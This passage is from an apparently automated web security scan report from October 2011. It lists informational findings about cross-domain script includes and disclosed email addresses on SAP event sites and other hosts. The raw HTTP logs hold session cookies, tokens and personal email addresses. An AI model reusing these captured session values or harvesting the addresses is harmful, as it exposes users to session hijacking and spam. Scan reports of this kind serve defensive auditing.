18.68. http://www.sapphirenow.com/madrid/player.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapphirenow.com
Path:   /madrid/player.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /madrid/player.html HTTP/1.1
Host: www.sapphirenow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
Content-Type: text/html
Date: Sat, 15 Oct 2011 15:04:53 GMT
Accept-Ranges: bytes
ETag: "70f68ef6d88cc1:0"
Connection: close
Last-Modified: Tue, 11 Oct 2011 23:25:28 GMT
X-Powered-By: ASP.NET
Content-Length: 1692

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta charset="utf-8">
<title></title>

<script type="text/javascript" src="js/html5.js"></
...[SNIP]...
</body>

<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
18.69. http://www.sapteched.com/china/11/cn/index/home.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapteched.com
Path:   /china/11/cn/index/home.asp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /china/11/cn/index/home.asp HTTP/1.1
Host: www.sapteched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 15:04:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 29014
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCQSADCD=MBILMGIAFEHOIDHDAECLIHAH; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="cont
...[SNIP]...
<!-- ROI Engine Analytics Tracking Code -->
<script language="javascript1.1" src="http://www.sap.com/global/js/roiengine.js"></script>
...[SNIP]...
<!-- ROI Engine Analytics Tracking Code -->
<script language="javascript1.1" src="http://www.sap.com/global/js/roiengine.js"></script>
...[SNIP]...
18.70. http://www.sapteched.com/emea/about/whoshouldattend.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapteched.com
Path:   /emea/about/whoshouldattend.htm

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /emea/about/whoshouldattend.htm HTTP/1.1
Host: www.sapteched.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASTBDDD=DBGKJPDAPICNJLACGEPPFAMJ; __utma=48829220.526440815.1318688537.1318688537.1318688537.1; __utmb=48829220.2.10.1318688537; __utmc=48829220; __utmz=48829220.1318688537.1.1.utmcsr=teched2011madrid.sapevents.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.cfm

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:23:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 33557
Content-Type: text/html; Charset=utf-8
Expires: Sat, 15 Oct 2011 14:23:53 GMT
Cache-control: private
Content-Length: 33557


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>SAP TechEd 201
...[SNIP]...
<br /><script type="text/javascript" src="http://static.ak.connect.facebook.com/connect.php/en_US"></script>
...[SNIP]...
<td width="180" style="display:block; word-wrap: break-word"><script src="http://nmp.newsgator.com/NGBuzz/buzz.ashx?buzzId=215423&apiToken=8A9F478544194B85AC55E891BBE40862" type="text/javascript"></script>
...[SNIP]...
<!-- ROI Engine Analytics Tracking Code -->
<script language="javascript1.1" src="http://www.sap.com/global/js/roiengine.js"></script>
...[SNIP]...
18.71. http://www.sapteched.com/emea/reghotel/home.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapteched.com
Path:   /emea/reghotel/home.htm

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /emea/reghotel/home.htm HTTP/1.1
Host: www.sapteched.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQASTBDDD=DBGKJPDAPICNJLACGEPPFAMJ; __utma=48829220.526440815.1318688537.1318688537.1318688537.1; __utmc=48829220; __utmz=48829220.1318688537.1.1.utmcsr=teched2011madrid.sapevents.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.cfm; __utmb=48829220.3.10.1318688537

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:27:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ntCoent-Length: 29370
Content-Type: text/html; Charset=utf-8
Expires: Sat, 15 Oct 2011 14:27:02 GMT
Cache-control: private
Content-Length: 29370


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>SAP TechEd 201
...[SNIP]...
<!-- ROI Engine Analytics Tracking Code -->
<script language="javascript1.1" src="http://www.sap.com/global/js/roiengine.js"></script>
...[SNIP]...
18.72. http://www.sapvirtualevents.com/teched/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /teched/ HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapvirtualevents.com/teched/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=3u4vth452bt54055m1l5rj55; IsFirstTimeLogin=1; userID=1; securityRoleID=0; .SESSION_COOKIE_TECHED=1|Anonymous|Anonymous||Anonymous@Anonymous.com|0|1|1|0|General Settings||edcbb5be-eddd-4d03-b903-d45503e9170c|United States|4b117873-111d-43fb-aa45-4e60c941153b|true; __utma=217282836.383781452.1318689024.1318689024.1318689024.1; __utmb=217282836.2.10.1318689025; __utmc=217282836; __utmz=217282836.1318689025.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; _pk_id.1.cbc3=7b9b230ebda00332.1318689026.1.1318689045.1318689026.; _pk_ses.1.cbc3=*

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:45:05 GMT
Content-Length: 92556


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
</div>

   <script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
<!-- GAM Code Starts -->

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<td align="center" style="padding-left: 2px; padding-right: 2px;">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a><script type="text/javascript"
src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<td align="center" style="padding-left: 2px; padding-right: 2px;">
<script src="http://platform.linkedin.com/in.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=sapglobalmarketing"></script>
...[SNIP]...
</iframe>
<script language="JavaScript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB"></script>
...[SNIP]...
18.73. http://www.sapvirtualevents.com/teched/Sessions.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/Sessions.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /teched/Sessions.aspx HTTP/1.1
Host: www.sapvirtualevents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 15 Oct 2011 15:04:56 GMT
Connection: close
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 81852


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
</div>

   <script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
</iframe>
<script language="JavaScript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB"></script>
...[SNIP]...
18.74. http://www.sapvirtualevents.com/teched/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /teched/default.aspx HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=3u4vth452bt54055m1l5rj55; IsFirstTimeLogin=1; userID=1; securityRoleID=0; .SESSION_COOKIE_TECHED=1|Anonymous|Anonymous||Anonymous@Anonymous.com|0|1|1|0|General Settings||edcbb5be-eddd-4d03-b903-d45503e9170c|United States|4b117873-111d-43fb-aa45-4e60c941153b|true

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:30:15 GMT
Content-Length: 92568


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
</div>

   <script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
<!-- GAM Code Starts -->

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<td align="center" style="padding-left: 2px; padding-right: 2px;">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a><script type="text/javascript"
src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<td align="center" style="padding-left: 2px; padding-right: 2px;">
<script src="http://platform.linkedin.com/in.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=sapglobalmarketing"></script>
...[SNIP]...
</iframe>
<script language="JavaScript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB"></script>
...[SNIP]...
18.75. http://www.sapvirtualevents.com/teched/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/login.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /teched/login.aspx?eventid=1&languageid=1&ReturnUrl=default.aspx%3feventname%3dteched%26 HTTP/1.1
Host: www.sapvirtualevents.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-fjhppofk=2EDAA13C560C1E5BA6FE9BC49EC91573; ASP.NET_SessionId=3u4vth452bt54055m1l5rj55

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /teched/default.aspx
Server: Microsoft-IIS/7.5
X-Powered-By: UrlRewriter.NET 2.0.0
X-AspNet-Version: 2.0.50727
Set-Cookie: IsFirstTimeLogin=1; path=/
Set-Cookie: userID=1; path=/
Set-Cookie: userID=1; path=/
Set-Cookie: securityRoleID=0; path=/
Set-Cookie: .SESSION_COOKIE_TECHED=1|Anonymous|Anonymous||Anonymous@Anonymous.com|0|1|1|0|General Settings||7df06b41-67e5-4e76-b695-2d83bcab420b|United States|4b117873-111d-43fb-aa45-4e60c941153b|true; expires=Tue, 15-Nov-2011 15:30:13 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:30:12 GMT
Content-Length: 29108

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fteched%2fdefault.aspx">here</a>.</h2>
</body></html>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional
...[SNIP]...
<!-- GAM Code Starts -->
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
18.76. http://www.sapvirtualevents.com/teched/sessiondetails.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sapvirtualevents.com
Path:   /teched/sessiondetails.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /teched/sessiondetails.aspx HTTP/1.1
Host: www.sapvirtualevents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Sat, 15 Oct 2011 15:04:57 GMT
Connection: close
X-Powered-By: UrlRewriter.NET 2.0.0
X-Powered-By: ASP.NET
Content-Length: 87176


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<!-- GAM Code Starts -->

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</div>

   <script type="text/javascript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB" > </script>
...[SNIP]...
<td align="center" style="padding-left: 2px; padding-right: 2px;">
<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</a><script type="text/javascript"
src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<td align="center" style="padding-left: 2px; padding-right: 2px;">
<script src="http://platform.linkedin.com/in.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=sapglobalmarketing"></script>
...[SNIP]...
</iframe>
<script language="JavaScript" src="http://www.sap.com/gwtservices/verifylogin.epx?vid=BD3A84A8-1397-4CBF-8AC9-F3FB7D197CFB"></script>
...[SNIP]...
18.77. http://www.sdn.sap.com/irj/scn/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/downloads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /irj/scn/downloads HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
SDN_RES_KEY: /webcontent/uuid/087fe75d-0501-0010-11bf-80f5c43d4f0c
Expires: 0
Date: Sat, 15 Oct 2011 15:04:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=scn; Path=/
Content-Length: 61519

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
18.78. http://www.sdn.sap.com/irj/scn/index  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sdn.sap.com
Path:   /irj/scn/index

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /irj/scn/index HTTP/1.1
Host: www.sdn.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: SAP J2EE Engine/7.00
Content-Language: en
Content-Type: text/html; charset=UTF-8
SDN_UID: Guest
SDN_GUID: QUMxMDY0MTctMTMzMDdGN0Q2QjMtNDhFODFEMTlDM0FFOUFD
SDN_VISIT: QUMxMDY0MTctMTMzMDdGODU0RTgtMzlBNUNEQkQwRDZFQkUxMA==
SDN_RES_KEY: /webcontent/uuid/10956870-6186-2b10-86ab-e0bbdc47e11f
Expires: 0
Date: Sat, 15 Oct 2011 15:04:50 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PortalAlias=scn; Path=/
Content-Length: 58094

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><LINK REL=stylesheet HREF="/irj/portalapps/com.sap.portal.design.portaldesigndata/th
...[SNIP]...
<div><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
...[SNIP]...
<div><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
19. Email addresses disclosed  previous  next
There are 47 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

19.1. http://news.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://news.google.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET /?output=rss HTTP/1.1
Host: news.google.com
User-Agent: Apple-PubSub/28
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Cookie: PREF=ID=1c6064f36e32b9c3:U=03104b41c0ee3541:FF=0:TM=1312153375:LM=1313343764:S=H7FPfYTuMn-u1fCQ; NID=50=tx_n-dWDSW80uze8vRfK4iXGb7IDXpNZmgnVzVHLwUYTIF422a6ukUbtmInZZYfUCCa_JdmNejqMh3f4M7UAaiD8sSPggfD0krg7EppcI7i3b-3-BdobEMRmphj_-AcA
Pragma: no-cache
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Set-Cookie:
P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=151657 for more info."
Expires: Sat, 15 Oct 2011 15:31:09 GMT
Date: Sat, 15 Oct 2011 15:26:09 GMT
Content-Type: application/xml; charset=UTF-8
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=300
Age: 97
Content-Length: 48988

<rss version="2.0"><channel><generator>NFE/1.0</generator><title>Top Stories - Google News</title><link>http://news.google.com/news?pz=1&amp;ned=us&amp;hl=en</link><language>en</language><webMaster>news-feedback@google.com</webMaster>
...[SNIP]...
19.2. http://nmp.newsgator.com/NGBuzz/4297/load.ashx/buzz  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nmp.newsgator.com
Path:   /NGBuzz/4297/load.ashx/buzz

Issue detail

The following email addresses were disclosed in the response:

Request

GET /NGBuzz/4297/load.ashx/buzz HTTP/1.1
Host: nmp.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapteched.com/emea/about/whoshouldattend.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 07 Oct 2011 20:12:43 GMT
ETag: hQ9hKm+/Wj6q9quOoSjKMg==
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Type: text/javascript; charset=utf-8
Content-Length: 195322
Vary: Accept-Encoding
Cache-Control: public, max-age=193
Expires: Sat, 15 Oct 2011 14:27:12 GMT
Date: Sat, 15 Oct 2011 14:23:59 GMT
Connection: close

/*
* All comments have been removed from these files. To view licenses, attributions and comments see this url: http://nmp.newsgator.com/NGBuzz/4297/load.ashx/buzz/unpacked
*/

(function() {
   /
...[SNIP]...
<matt@mattkruse.com>
...[SNIP]...
<span class="ng_FormExample">(someone@example.com)</span>
...[SNIP]...
<span class="ng_FormExample">(me@example.net)</span>
...[SNIP]...
19.3. https://sapphire-nowmadrid.sapevents.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sapphire-nowmadrid.sapevents.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: sapphire-nowmadrid.sapevents.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=961013;expires=Mon, 07-Oct-2041 14:35:04 GMT;path=/
Set-Cookie: CFTOKEN=cb2412da3e988c3-0801EEF5-0494-7B81-1E70242D17ED02CD;expires=Mon, 07-Oct-2041 14:35:04 GMT;path=/
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:35:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/jav
...[SNIP]...
<a class="navigation" href="mailto:sap@delegate.com?subject=SAPPHIRE NOW from Madrid Inquiry">
...[SNIP]...
<a href="mailto:sap@delegate.com" target="_blank" title="SAPPHIRE NOW Buy 4 Get 1 Free">
...[SNIP]...
<a class="navigation" href="mailto:sap@delegate.com?subject=SAPPHIRE NOW from Madrid Inquiry">sap@delegate.com</a>
...[SNIP]...
19.4. http://scripts.omniture.com/javascript.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scripts.omniture.com
Path:   /javascript.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascript.js HTTP/1.1
Host: scripts.omniture.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.omniture.com/en/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: elqCustomerGUID=f788d26b-a328-4c76-a75e-75f5d13f522a; campaign_stack=%5B%5B'natural_bookmark'%2C'1314743495330'%5D%5D; s_cid=natural_bookmark; _jsuid=229033120498741338; search_stack=%5B%5B'seo_other_referer'%2C'1314795804321'%5D%5D; sso_enabled=1; v1stsp=ABD4EE251C299F74; imploded_vars=50.23.123.106%7CNow+Defined+by+Test+and+Target%7C; s_iid=38573; s_osc=38585; s_lv=1317139901232; s_sv_p1=1@26@s/7243/7019/7341/6423&e/15; mbox=check#true#1318631931|session#1318631777052-118529#1318633731|PC#1318631777052-118529.19#1319841471; mbox-staging=check#true#1318631939|session#1318631787015-280970#1318633739|PC#1318631787015-280970.19#1319841479
If-Modified-Since: Fri, 14 Oct 2011 05:49:22 GMT

Response

HTTP/1.1 200 OK
Server: Omniture AWS/2.0.0
Last-Modified: Sat, 15 Oct 2011 03:25:55 GMT
Vary: Accept-Encoding
xserver: www5.dmz
Content-Type: text/javascript;charset=utf-8
Content-Length: 512196
Cache-Control: public, max-age=14400
Expires: Sat, 15 Oct 2011 17:47:00 GMT
Date: Sat, 15 Oct 2011 13:47:00 GMT
Connection: close

/* Version: 1.0 */
/* files/global/scripts/general/global.js */
/* files/global/scripts/general/validate_forms.js */
/* files/global/scripts/general/base64.js */
/* files/global/scripts/tracking/s_cod
...[SNIP]...
<brian@cherne.net>
...[SNIP]...
19.5. http://smepartnerfinder.sap.com/en/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://smepartnerfinder.sap.com
Path:   /en/

Issue detail

The following email address was disclosed in the response:

Request

GET /en/ HTTP/1.1
Host: smepartnerfinder.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/sme/partners/findpartner/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sdn.sap.com%2firj%2fscn%2fweblogs%3fblog%3d%2fpub%2fwlg%2f26917; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; mbox=session#1318688512533-813903#1318690710|check#true#1318688910; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; 